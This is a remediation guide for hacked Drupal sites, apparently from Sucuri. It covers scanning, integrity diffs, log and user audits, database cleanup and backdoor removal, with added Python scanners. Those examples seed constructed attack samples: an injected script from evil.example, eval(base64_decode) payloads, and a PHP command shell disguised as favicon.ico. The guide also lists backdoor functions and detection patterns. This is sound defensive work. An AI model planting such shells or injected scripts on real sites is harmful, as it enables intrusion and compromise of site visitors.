HOW TO CLEAN A HACKED DRUPAL SITE

Fix the hack and protect your Drupal website.

Sucuri is committed to helping server administrators check their website for hacks and remove malware infections. We created this guide so Drupal users can identify and fix a Drupal hack. This is not meant to be an all-encompassing guide, but it addresses the most common infections we see.

Step 1

IDENTIFY HACK

Before you begin, make a full copy of the site (files and database) and set it aside unmodified for forensic analysis of the hack if required. This is especially important for larger websites and in industries where legal issues or HIPAA and PCI compliance breaches may be a concern.

As an optional step, you may want to document the steps you take to identify, remediate, and protect your Drupal site. This could prove useful down the line if you run into similar issues, or to follow up with your project stakeholders.

As described in the official Drupal guide for hacked sites, you should decide whether you wish to investigate and fix the hack, roll back, or rebuild your site. This guide focuses on how to clean the infection manually. If you need help, we offer affordable plans to clean and protect your Drupal site year-round.

Common Indicators of a Hacked Drupal Site

  • Spam keywords in nodes and search engine content
  • New nodes from an unauthorized user
  • File modifications or Drupal core integrity issues
  • Unknown files under sites/default/files
  • Security warnings by Google, Bing, McAfee, etc.
  • Unexpected, slow, or abnormal site behavior
  • Host suspended your site for malicious activity
  • Malicious new users in the Drupal dashboard

1.1 Scan Your Site

You can use tools that scan your site remotely to find malicious payloads and malware locations. These instructions are for our free remote scanner, SiteCheck. Other online scanners and Drupal extensions can also help you look for indicators of compromise, malicious payloads, and other security issues. Tools for checking security misconfigurations in Drupal could help you identify possible attack vectors.

To scan Drupal for hacks:

  1. Visit SiteCheck and enter your website URL.
  2. Click Scan Website.

  3. If the site is infected, review the warning message.

  4. Note any payloads, locations (if available), and blacklist warnings.

If you have multiple websites on the same server we recommend scanning them all. Cross-site contamination is one of the leading causes of reinfections. We encourage every website owner to isolate their hosting and web accounts. See the Drupal Multisite Docs for more info.

Drupal modules to scan your site:

  • Hacked!: Scans your Drupal software against known good copies (Drush UI available).
  • Site Audit: Detect common problems with Drupal including security issues.
  • Security Review: Test your site against a checklist of common security issues.

Note

A remote scanner will check the site externally using different user-agents, but some issues do not present themselves in a browser. Hidden infections (e.g., backdoors, phishing pages, and hidden scripts) can be found using a server side scanner. Learn more about how remote scanners work.

1.2 Check Modified Files

New or recently modified Drupal files may be part of the hack. Your core, contributed, and custom modules should also be checked against known good copies to identify malware injections.

Note

We highly recommend using FTPS/SFTP/SSH rather than unencrypted FTP.

The quickest way to confirm the integrity of your Drupal files is with git status (or another version control system): it lists every file added or modified since your last commit, so you can review the unexpected changes and then check out the last known good revision. This only works if the deployed code is tracked and the repository itself was not tampered with.

To use git to check for changes:

  1. Connect to your server over SSH, change to your Drupal root, and run: git status

  2. Identify new and modified files.

  3. Navigate through your directories and note anything unusual.

You can also use the Hacked! module for Drupal to get a report of any integrity issues with your core files and modules.

Caution

It is important that you compare the same version of your Drupal core files and extensions. Core files on the 8.x branch are not the same as the 7.x branch and so on.

Another option is to use the diff command in a terminal to compare your installation against a clean copy. The official release archives are published on drupal.org (ftp.drupal.org/files/projects/), and every tagged version is also mirrored on GitHub. The following commands use version 8.3.5 as an example of the clean files and ~/public_html as an example of where your Drupal installation is located; run them from a scratch directory outside the web root so the clean copy never becomes web-accessible. The final diff command lists every file that differs between the clean tree and your installation (drop -q to see the actual changes). Expect legitimate differences in sites/default/files, sites/default/settings.php and your own modules and themes; if you use the GitHub mirror instead of the drupal.org package, the vendor directory will also be missing from the clean copy.

To check core file integrity with SSH commands:

  • $ mkdir ~/drupal-clean && cd ~/drupal-clean
  • $ wget https://ftp.drupal.org/files/projects/drupal-8.3.5.tar.gz
  • $ tar -zxvf drupal-8.3.5.tar.gz
  • $ diff -rq drupal-8.3.5 ~/public_html

To manually check recently modified files:

  1. Log into your server using an FTP client or SSH terminal.

  2. If using SSH, you can list all files modified in the last 15 days using this command: $ find ./ -type f -mtime -15 (an attacker can reset a file's modification time with touch, so also run $ find ./ -type f -ctime -15, which uses the harder-to-forge inode change time, and compare the two lists).

  3. If using SFTP, review last modified date column for all files on the server.

  4. Note any files that have been recently modified.

Unfamiliar modifications in the last 7-30 days may be suspicious and require further investigation.

1.3 Audit User Logs

Verify any unknown Drupal user accounts, especially administrators.

To check for malicious users in Drupal:

  1. Log into your Drupal admin interface (yoursite.com/user/login)

  2. Click People on the menu.

  3. Sort the list by the Member For column and review recently created accounts.

  4. Remove any unfamiliar users that were created by hackers.

  5. Check the Last Access Time of legitimate users (may indicate compromised account).

  6. Confirm any users that logged in at suspicious times.

Note

Wait to change user passwords until after you have completely cleared the site of malware; if a backdoor is still in place, the attacker can simply capture or reset the new credentials. You can use a module like Mass Password Reset to force all users to reset their passwords.

You can also parse your server logs if you know how to search for requests to the /user/login area. Any Drupal users who have logged in at unusual times or geographic locations may have been compromised.
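The log parsing mentioned above, as an added example that is not part of the Sucuri guide: it reads access log lines in the Apache/nginx combined format, counts POST requests to /user/login per client address, and flags addresses with repeated failures as well as successful logins outside working hours. The log lines are constructed; the convention that a successful login is answered with a redirect and a failed one with the re-rendered form (200) is an assumption you should confirm against a known-good login in your own log.

```python
# Added example (not from the Sucuri guide): audit Drupal login activity in a
# web server access log (Apache/nginx "combined" format). Log lines are
# constructed; the response-code convention is an assumption stated below.
import re
from collections import Counter
from datetime import datetime

# One combined-format line: ip ident user [time] "method path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample: a scripted attacker guessing passwords at 03:14 and
# succeeding on the fourth try, followed by a normal daytime login.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2018:03:14:01 +0000] "POST /user/login HTTP/1.1" 200 5123 "-" "python-requests/2.18"
203.0.113.5 - - [12/Mar/2018:03:14:02 +0000] "POST /user/login HTTP/1.1" 200 5123 "-" "python-requests/2.18"
203.0.113.5 - - [12/Mar/2018:03:14:03 +0000] "POST /user/login HTTP/1.1" 200 5123 "-" "python-requests/2.18"
203.0.113.5 - - [12/Mar/2018:03:14:04 +0000] "POST /user/login HTTP/1.1" 302 0 "-" "python-requests/2.18"
203.0.113.5 - - [12/Mar/2018:03:14:05 +0000] "GET /admin/people HTTP/1.1" 200 8821 "-" "python-requests/2.18"
198.51.100.7 - - [12/Mar/2018:10:02:44 +0000] "GET /user/login HTTP/1.1" 200 4711 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2018:10:02:59 +0000] "POST /user/login HTTP/1.1" 302 0 "https://example.com/user/login" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2018:10:03:01 +0000] "GET /node/add HTTP/1.1" 200 6620 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["status"] = int(ev["status"])
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["path"] = ev["path"].split("?", 1)[0]  # drop ?destination=... etc.
    return ev


def is_login_post(ev):
    # Clean-URL form. A Drupal 7 site without clean URLs logs /?q=user/login
    # instead, which the query-string strip above would hide; adjust if so.
    return ev["method"] == "POST" and ev["path"] == "/user/login"


def audit_logins(lines, max_failed=3, work_hours=(8, 18)):
    """Count login attempts per IP and flag brute force and off-hours logins.

    Assumption: Drupal answers a successful POST /user/login with a redirect
    (3xx) and re-renders the form (200) when the credentials are wrong.
    Hours are taken in the log's own timezone.
    """
    failed, success, off_hours = Counter(), Counter(), []
    for line in lines:
        ev = parse_line(line)
        if not ev or not is_login_post(ev):
            continue
        if 300 <= ev["status"] < 400:
            success[ev["ip"]] += 1
            if not work_hours[0] <= ev["ts"].hour < work_hours[1]:
                off_hours.append((ev["ip"], ev["ts"].isoformat()))
        else:
            failed[ev["ip"]] += 1
    ips = sorted(set(failed) | set(success))
    return {
        "attempts": {ip: {"failed": failed[ip], "success": success[ip]} for ip in ips},
        "brute_force": [ip for ip in ips if failed[ip] >= max_failed],
        "off_hours": off_hours,
    }


if __name__ == "__main__":
    report = audit_logins(SAMPLE_LOG.splitlines())
    for ip, counts in report["attempts"].items():
        print(ip, counts)
    print("brute force:", report["brute_force"])
    print("off-hours logins:", report["off_hours"])
```

Feed audit_logins the lines of your real log; an address that fails repeatedly and then succeeds, as in the sample, is the pattern to chase first, and the user-agent field kept in each parsed event is often enough to tell a script from a browser.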

1.4 Check Diagnostic Pages

If your Drupal site has been blacklisted by Google or other website security authorities, you can use their diagnostic tools to check the security status of your Drupal website.

For more information about these security warnings, read our guide explaining the Google blacklist.

To check your Google Transparency Report:

  1. Visit the Safe Browsing Site Status website.

  2. Enter your site URL and search.

  3. On this page you can check:

    • Site Safety Details (information about malicious redirects, spam and downloads).
    • Testing Details (most recent Google scans that found malware).

If you have added your site to any free webmaster tools (for example Google Search Console), you can check their security ratings and reports for your website. If you do not already have accounts for these free monitoring tools, we highly recommend that you sign up.

Step 2

FIX HACK

Now that you have identified potentially compromised users and malware locations, you can remove malware from Drupal and restore your website to a clean state.

Pro Tip:

The best way to identify hacked files is by comparing the current state of the site with an old and clean backup. If a backup is available, you can use that to compare the two versions and identify what has been modified.

Note

Some of these steps require web server and database access. If you are not familiar with manipulating database tables or editing PHP, please seek assistance from a professional Incident Response Team member who can completely remove Drupal malware.

2.1 Clean Hacked Website Files

If any scans or diagnostic pages revealed malicious domains or payloads, you can start by looking for those files on your Drupal web server.

If you use a version control system like git, you can roll back to a known good copy, delete new suspicious files, and use git checkout to revert any maliciously modified files.

By comparing infected files with known good files (from official sources or reliably clean backups) you can identify and remove malicious changes.

Caution

It is important that you compare the same version of your Drupal core files and extensions. Core files on the 8.x branch are not the same as the 7.x branch and so on.

Never perform any actions without a backup. If you need help with this, review the official Drupal Backup Docs or look into free Drupal backup tools such as Backup and Migrate and Node Squirrel.

To manually remove a malware infection from your Drupal files:

  1. Log into your server via SFTP or SSH.

  2. Create a backup of the site files before making changes.

  3. Search your files for reference to malicious domains or payloads you noted.

  4. Identify recently changed files and confirm whether they are legitimate.

  5. Review files flagged during the core file integrity check.

  6. Restore or compare suspicious files with clean backups or official sources.

  7. Remove any suspicious or unfamiliar code from your custom files.

  8. Test to verify the site is still operational after changes.

If you can't find the malicious content, try searching the web for malicious content, payloads, and domain names that you found in the first step. Chances are that someone else has already figured out how those domain names are involved in the hack you are attempting to clean.

Top Drupal directories where we find malware infections:

  • ./sites/all/modules/panels/help/
  • ./sites/all/themes/
  • ./profiles

2.2 Clean Hacked Database Tables

To remove a malware infection from your Drupal database, you need to open a database admin panel, such as phpMyAdmin. You can also use tools like Search-Replace-DB or Adminer, or drush sql-cli from the command line.

To manually remove a malware infection from Drupal database tables:

  1. Log into your database admin panel.

  2. Make a backup of the database before making changes.

  3. Search for suspicious content (e.g., spammy keywords, links).

  4. Open the table that contains suspicious content.

  5. Manually remove any suspicious content.

  6. Test to verify the site is still operational after changes.

  7. Remove any database access tools you may have uploaded.

You can manually search your Drupal database for common malicious PHP functions, such as eval, base64_decode, gzinflate, preg_replace, str_replace, etc. PHP stored in a node body only executes if the Drupal 7 PHP filter module is enabled (rows with body_format set to php_code), so if you find that format in use, disable the module once the content is cleaned. Note that these functions are also used by Drupal extensions for legitimate reasons, so be sure you test changes or get help so you do not accidentally break your site.

Caution

Manually removing “malicious” code from your website files can be extremely hazardous to the health of your website. Never perform any actions without a backup. If you’re unsure, please seek assistance from a professional.

Top infected Drupal database tables we see (Drupal 7 names; on Drupal 8 the body field lives in node__body and node_revision__body):

  • field_data_body
  • field_revision_body
  • cache_field
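The database search described in this section, as an added example that is not part of the Sucuri guide. It runs the LIKE queries against a constructed copy of Drupal 7's field_data_body table in SQLite so they can be tried offline; the same statements work unchanged in phpMyAdmin or drush sql-cli, and on Drupal 8 the table is node__body. It also shows the check for bodies stored in the php_code format and a targeted REPLACE that strips one reviewed injected string rather than editing the row by hand. The rows are constructed.

```python
# Added example (not from the Sucuri guide): the database searches from this
# section, run against a small constructed copy of Drupal 7's field_data_body
# table in SQLite so they can be tried offline. Against a live site, run the
# same statements in phpMyAdmin or `drush sql-cli`; on Drupal 8 the table is
# node__body. The sample rows are constructed.
import sqlite3

# LIKE patterns that are rarely legitimate inside a node body. LIKE is
# case-insensitive for ASCII in both MySQL and SQLite.
SUSPICIOUS_PATTERNS = {
    "script_tag": "%<script%",
    "iframe": "%<iframe%",
    "php_eval": "%eval(%",
    "base64": "%base64_decode(%",
    "hidden_block": "%display:none%",
    "pharma_spam": "%viagra%",
}

SEARCH_SQL = ("SELECT entity_id, revision_id, substr(body_value, 1, 80) "
              "FROM field_data_body WHERE body_value LIKE ?")
# Rows using the Drupal 7 PHP filter format execute as PHP when rendered.
PHP_FORMAT_SQL = "SELECT entity_id FROM field_data_body WHERE body_format = 'php_code'"
# REPLACE exists in MySQL and SQLite; use it only after reviewing the hit.
REMOVE_SQL = ("UPDATE field_data_body SET body_value = REPLACE(body_value, ?, '') "
              "WHERE entity_id = ?")

INJECTED_SCRIPT = "<script src='http://evil.example/x.js'></script>"
SAMPLE_ROWS = [  # (entity_id, revision_id, body_value, body_format), constructed
    (1, 1, "<p>Welcome to our site.</p>", "filtered_html"),
    (2, 2, "<p>Our services.</p>" + INJECTED_SCRIPT, "filtered_html"),
    (3, 3, '<div style="display:none"><a href="http://spam.example">cheap viagra</a></div>',
     "filtered_html"),
    (4, 4, "<?php eval(base64_decode('ZWNobyAxOw==')); ?>", "php_code"),
]


def load_sample(conn):
    conn.execute("CREATE TABLE field_data_body (entity_id INTEGER, revision_id INTEGER, "
                 "body_value TEXT, body_format TEXT)")
    conn.executemany("INSERT INTO field_data_body VALUES (?, ?, ?, ?)", SAMPLE_ROWS)


def find_suspicious(conn):
    """Map pattern name -> entity_ids whose body matches it (empty ones omitted)."""
    hits = {}
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        rows = conn.execute(SEARCH_SQL, (pattern,)).fetchall()
        if rows:
            hits[name] = [row[0] for row in rows]
    return hits


def php_format_nodes(conn):
    """Nodes whose body is rendered through the PHP filter."""
    return [row[0] for row in conn.execute(PHP_FORMAT_SQL)]


def remove_exact(conn, entity_id, injected):
    """Strip one reviewed injected string from one node; returns rows changed."""
    cur = conn.execute(REMOVE_SQL, (injected, entity_id))
    conn.commit()
    return cur.rowcount


def run_demo():
    conn = sqlite3.connect(":memory:")
    load_sample(conn)
    before = find_suspicious(conn)
    changed = remove_exact(conn, 2, INJECTED_SCRIPT)
    after = find_suspicious(conn)
    return {"before": before, "php_format": php_format_nodes(conn),
            "changed": changed, "after": after}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Run the revision table (field_revision_body, or node_revision__body on Drupal 8) through the same queries, otherwise reverting a node to an older revision can bring the injection back, and back the database up before any UPDATE.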

2.3 Remove Hidden Backdoors

Hackers always leave a way to get back into your site. More often than not, we find multiple backdoors of various types in hacked Drupal sites.

Backdoors are usually embedded in files that are named just like legitimate files within the official Drupal framework but located in the wrong directories. Attackers can also inject backdoors into files like index.php and directories like /modules, /themes, /sites/all/modules, and /sites/all/themes.

Backdoors commonly include the following PHP functions (the list also carries a few JavaScript and shell indicators that turn up in injected scripts and dropped-in files):

  • base64_decode / base64_encode
  • str_rot13
  • gzuncompress
  • gzinflate
  • eval
  • exec
  • create_function
  • location.href (JavaScript redirect)
  • curl_exec
  • stream (stream functions and wrappers such as php://input)
  • system
  • assert
  • stripslashes
  • preg_replace (with the /e modifier, removed in PHP 7)
  • move_uploaded_file
  • strrev
  • file_get_contents
  • encodeURI (JavaScript)
  • wget (shell)

Caution

These functions can also be used legitimately by Drupal extensions, so be sure to test any changes because you could break your site by removing benign functions.

Always remember to compare files using the same Drupal version.
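A triage scanner for the function list above, as an added example that is not part of the Sucuri guide. It walks a Drupal tree, scores each file by which of the listed indicators it contains, treats Drupal's .module, .inc, .install and .theme files as PHP, and also catches PHP hidden in files with innocent extensions such as favicon.ico. The weights and the sample files it creates in a temporary directory are constructed for the demonstration; the scores rank what to read first and are not evidence of compromise on their own.

```python
# Added example (not from the Sucuri guide): a triage scanner that walks a
# Drupal tree and scores files by the backdoor indicators listed above. It
# ranks what to read first; it does not prove compromise, since legitimate
# modules use many of these functions. Sample files and weights are
# constructed for the demonstration.
import os
import re
import tempfile

# Drupal code lives in .module/.inc/.install/.theme files as well as .php.
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".phar", ".module", ".inc",
                  ".install", ".theme", ".engine", ".profile")

# (regex, weight, description). Weights are a judgement call for this example.
SIGNATURES = [
    (re.compile(r"\beval\s*\(", re.I), 4, "eval()"),
    (re.compile(r"\bassert\s*\(\s*\$", re.I), 4, "assert() on a variable"),
    (re.compile(r"preg_replace\s*\(\s*['\"]/.*?/[a-zA-Z]*e[a-zA-Z]*['\"]"), 4,
     "preg_replace with /e"),
    (re.compile(r"\bcreate_function\s*\(", re.I), 3, "create_function()"),
    (re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I), 3,
     "command execution"),
    (re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\)", re.I), 3,
     "request parameter passed straight into a call"),
    (re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I), 2,
     "decoding or obfuscation"),
    (re.compile(r"\bmove_uploaded_file\s*\(", re.I), 2, "file upload"),
    (re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"), 2, "long base64-looking blob"),
]


def scan_file(path, rel):
    """Score one file; returns None for files that contain no PHP at all."""
    with open(path, "rb") as fh:
        text = fh.read(2_000_000).decode("latin-1")
    php_ext = rel.lower().endswith(PHP_EXTENSIONS)
    if not php_ext and "<?php" not in text[:4096] and "<?=" not in text[:4096]:
        return None
    score, reasons = 0, []
    if not php_ext:  # e.g. favicon.ico or image.jpg that starts with <?php
        score, reasons = 2, ["PHP code in a non-PHP file"]
    for pattern, weight, desc in SIGNATURES:
        if pattern.search(text):
            score += weight
            reasons.append(desc)
    return {"path": rel, "score": score, "reasons": reasons}


def scan_tree(root, threshold=4):
    """All files at or above threshold, highest score first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result = scan_file(full, rel)
            if result and result["score"] >= threshold:
                findings.append(result)
    return sorted(findings, key=lambda f: (-f["score"], f["path"]))


# Constructed sample tree: clean core, a legitimate module that happens to
# decode base64, a dropped-in backdoor, and a PHP shell disguised as an icon.
SAMPLE_FILES = {
    "core/lib/Drupal.php": "<?php\nclass Drupal { const VERSION = '8.3.5'; }\n",
    "modules/custom/mymodule/mymodule.module":
        "<?php\nfunction mymodule_decode($s) { return base64_decode($s); }\n",
    "sites/all/modules/panels/help/help.php":
        "<?php\nif (isset($_POST['x'])) { eval(base64_decode($_POST['x'])); }\n",
    "sites/default/files/favicon.ico": '<?php @system(stripslashes($_GET["c"])); ?>',
}


def run_demo():
    """Write the constructed tree to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            os.makedirs(os.path.dirname(os.path.join(tmp, rel)), exist_ok=True)
            with open(os.path.join(tmp, rel), "w") as fh:
                fh.write(body)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['score']:3}  {f['path']}  ({', '.join(f['reasons'])})")
```

Point scan_tree at your web root and start from the top of the list; the legitimate module in the sample that merely calls base64_decode scores below the threshold, which is exactly the false-positive case the caution above warns about.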

To remove backdoors by comparing files:

  1. Confirm your Drupal version under Reports > Status report (or run drush status on the server).

  2. Download the same version of known good core files from the official Drupal release archive on drupal.org.

  3. Log into your server via SFTP or SSH.

  4. Create a backup of the site files before making changes.

  5. In your FTP client, compare your site with the known good download.

  6. Investigate any new files on your server that do not match the known good files.

  7. Investigate any files that are not the same size as the known good files.

  8. If using version control, commit and push the new code.

The majority of malicious code we see uses some form of encoding to prevent detection. Aside from a few commercial add-ons that obfuscate their licensing checks, it's very rare to see encoded code in modules published on drupal.org, so an encoded blob in a module or theme file deserves a close look.

It is critical that all backdoors are closed in order to successfully clean a Drupal hack, otherwise your site will be reinfected quickly.

2.4 Fix Malware Warnings

If you were blacklisted by Google, McAfee, Yandex (or any other web spam authorities), you can request a review after the hack has been fixed. Google is now limiting known repeat offenders to one review request every 30 days. Be sure your site is clean before requesting a review!

For more details on how to remove website security warnings, read our guide explaining how to remove the Google blacklist.

To remove malware warnings on your site:

  1. Call your hosting company and ask them to remove the suspension.

    • You may need to provide details about how you removed the malware.
  2. Fill in a review request form for each blacklisting authority.

    • e.g. Google Search Console, McAfee SiteAdvisor, Yandex Webmaster.
  3. The review process can take several days.

Note

With the Sucuri Platform, we submit blacklist review requests on your behalf. This helps ensure your site is absolutely ready for review. Some reviews however, such as web spam hacks as a result of manual actions, can take up to two weeks.

Step 3

POST - HACK

In this final step, you will learn how to fix the issues that caused Drupal to be hacked in the first place. You will also perform essential steps to enhance the security of your Drupal site.

3.1 Update and Reset

Outdated software is one of the leading causes of infection, and it is important to remove any known vulnerable extensions. Though Drupal stores passwords as salted hashes, which makes them costly to recover from a stolen database, it's always a good idea to reset passwords to ensure you are not reinfected if hackers gained access to your credentials.

Clear Active Sessions

If a user account has been compromised it's important to log them out and force a password reset so they lose access to your site. The sessions table in your Drupal database holds every active login session; emptying it invalidates all of them (it is not a historical log, so nothing is lost for forensics).

To clear active Drupal user sessions:

  1. Log into your database admin panel.

  2. Open the sessions table.

  3. Select Empty (TRUNCATE) to remove all rows from the table.

  4. All users will now be logged out.

Reset API Keys

Your API keys in Drupal should be reset to ensure they have not been compromised by the attackers. Additionally, if your website connects to external services (such as marketing services, payment gateways, and shipping providers) it is a good idea to create new API keys for those services.

We recommend using the Key module along with Lockr to ensure keys are managed offsite.

Update Drupal Core and Extensions

Update all Drupal software including core files, themes, and modules.

To check and update Drupal extensions:

  1. Make sure you have a recent backup of your site.

  2. Log into your Drupal admin interface.

  3. Click Reports on the menu and open Available updates.

  4. Note any available updates and check for any module-specific update instructions.

To update Drupal software we recommend using Drush. Note that drush up (pm-update) applies to Drupal 7 and to Drupal 8 sites that are not managed with Composer; a Composer-managed Drupal 8 site must be updated with composer update drupal/core --with-dependencies followed by drush updatedb instead of step 1.

  1. Log into your server using an SSH terminal and run the command: drush up

  2. Follow the interface to select core and modules to update.

  3. Test your site to ensure the updated modules did not break any functionality.

  4. If using version control, commit and push the new code.

Drupal 8.x is where all new developments in core are happening. Drupal 7.x continues to receive updates for known vulnerabilities. We recommend keeping an eye on the Drupal Security page for security alerts. Users on the 6.x branch or lower are no longer receiving security patches and are strongly encouraged to upgrade to 8.x by following the Drupal Upgrade Docs.

If SiteCheck identified other outdated software on your server (e.g., Apache, cPanel, PHP) in the first step of this guide, you should update it to ensure you have all available security patches.

If you cannot patch, consider activating a website application firewall to virtually patch your site.

If you are manually updating core files, follow the official upgrade docs for Drupal 8 and Drupal 7.

To manually update Drupal core files:

  1. Make sure you have a recent backup of your site.

  2. Click Configuration on the menu, then under Development select Maintenance mode and put the site into maintenance mode.

  3. Delete everything except the sites folder and your custom files (on Drupal 8 custom modules and themes may also live in the top-level modules and themes directories, and keep any customized .htaccess or robots.txt).

  4. Upload the new Drupal files, taking care not to overwrite custom files.

  5. Run the update.php file in your browser.

  6. Switch the site out of Maintenance mode and test.

Caution

Be careful not to overwrite the settings.php file (in sites/default), as this will break your site!

Clear Cache

Once you are sure everything has been cleaned and updated, as with any update to your site, you should clear the Drupal cache so the latest version of your site is visible to everyone. We recommend using Drush commands drush cache-rebuild (Drupal 8) or drush cache-clear all (Drupal 7).

To manually clear the Drupal cache:

  1. Log into your Drupal website.

  2. Click Configuration on the menu.

  3. Under Development click Performance.

  4. Click the Clear all caches button.

Reset User Credentials

You should reset all user passwords with unique, strong passwords to avoid reinfection.

To reset passwords for Drupal user accounts:

  1. Log into your Drupal administrator area.

  2. Click People on the menu.

  3. Click the Edit button under the Operations column for each user.

  4. Change the user’s password.

  5. Repeat for each user on your site.

You should reduce the number of administrator accounts for Drupal, and for all of your website systems. Practice the principle of least privilege: only give people the access they require to do their job.

Keep in mind that the first user created by Drupal during installation (user 1) is the most powerful user in the system: it bypasses all permission checks, even those that apply to the administrator role. Because of this it should not be used for day-to-day work. Instead, every administrator should have their own account so you can limit and audit admin permissions individually.

Note

All accounts should use strong passwords: complex, long, and unique. We recommend using a password manager and its generator to simplify the process.

3.2 Set Backups

Backups function as a safety net. Now that your Drupal site is clean and you’ve taken some important post-hack steps, make a backup! Having a good backup strategy is at the core of a good security posture. For more information, review the Drupal Backup Docs. There are also some great free Drupal backup tools such as Node Squirrel.

Here are some tips to help you with website backups:

  • Location

    Store Drupal backups in an off-site location. Never store backups (or old versions) on your server; they can be hacked and used to compromise your real site.

  • Automatic

    Ideally your backup solution should run automatically at a frequency that suits the needs of your website.

  • Redundancy

    Store your backups in multiple locations (cloud storage, your computer, external hard drives).

  • Testing

    Try the restore process to confirm your website functions correctly.

  • File Types

    Some backup solutions exclude certain file types such as videos and archives.

Note:

If you are an existing customer, Sucuri offers an affordable system for secure website backups.

3.3 Scan Your Computer

Have all Drupal users run a scan with a reputable antivirus program on their operating systems.

Drupal can be compromised if a user with an infected computer has access to the dashboard. Some infections are designed to jump from a computer into text editors or FTP clients.

Note

You should have only one antivirus actively protecting your system to avoid conflicts. If your Drupal Dashboard user’s computers are not clean, your site can get reinfected easily.

3.4 Protect Your Site

You can harden your Drupal site by restricting file permissions and implementing custom .htaccess or nginx.conf rules. In particular, Drupal writes a protective .htaccess into sites/default/files that stops PHP from executing in the upload directory; confirm it is still present and unmodified, and apply the equivalent rule in nginx if Apache is not in use. We recommend reviewing the Drupal Security Docs to learn how.

There are a number of modules and tools that can help you protect your Drupal site and prevent a future hack. Many are free and can make it easier to manage specific aspects of website security. A good website security plan includes protection, monitoring, and response.

Recommended security modules for Drupal:

  • Security Review: Test your site against a checklist of common security issues.
  • Paranoia: Prevents PHP code execution in certain areas and prevents risky permissions being granted.
  • Password Policy: Define user password policies and strength requirements.
  • TFA: Adds another layer to password security using two-factor authentication options.
  • HoneyPot: Protects your login and web forms from being submitted by malicious bots.
  • Automated Logout: Automatically log users out after a period of inactivity.
  • Login Security: Limit login attempts and whitelist access using allowed IP addresses.
  • Spam Span: Obfuscates email addresses to stop spammers from abusing them.
  • Encrypt: Enables encrypted communication allowing modules to keep data secured.
  • Real AES: An authenticated encryption method plugin for the Encrypt module.
  • Key: A module that allows other modules to encrypt, filter, and validate data.
  • Lockr: Secure, offsite storage and management of API and encryption keys.
  • Site Audit: Detect common problems with Drupal including security issues.
  • Permissions Lock: Fine-tune user roles and ability to grant permissions.
  • Secure Permissions: Enforces permission management via code instead of UI.
  • Mass Password Reset: Force password resets for users if they are lost or stolen.
  • Guardr: Distribution modules and settings for enterprise security.

Drupal is a complex and highly extensible CMS, and software vulnerabilities are difficult to predict. Trying to keep up with security patches is challenging for administrators. Website application firewalls provide a perimeter defense surrounding your website and block malicious requests before they reach Drupal.

Benefits to using a website firewall:

  1. Prevent a Future Hack

    By detecting and stopping known hacking methods and behaviors, a website firewall keeps your site protected against infection in the first place, including the OWASP Top 10 vulnerabilities.

  2. Virtual Security Update

    Known vulnerabilities are constantly being exploited, and new zero-day attacks are always emerging. A good website firewall will virtually patch and harden your holes in your website software even if you can’t apply security updates in time.

  3. Block Brute Force Attack

    A website firewall should stop anyone from accessing your Drupal admin interface if they aren't supposed to be there, making sure they can’t use brute force automation to guess your user passwords.

  4. Mitigate DDoS Attack

    Distributed Denial of Service (DDoS) attacks attempt to overload your server or web application resources. By detecting and blocking all types of DDoS attacks, a website firewall ensures availability and uptime.

  5. Performance Optimization

    Most WAFs will offer a CDN caching for faster global page speed. This keeps your visitors happy and is proven to lower bounce rates while improving website engagement, conversions, and search engine rankings.

If you would like help protecting your website, we are available to chat with you about the benefits of using a website application firewall.

After taking steps to secure your Drupal site against future hacks, be sure to keep a record along with your mitigation and identification steps.

Please share this guide if you found it useful and help promote website security education to other website owners. Let us know if you have suggestions to improve this guide in the future.
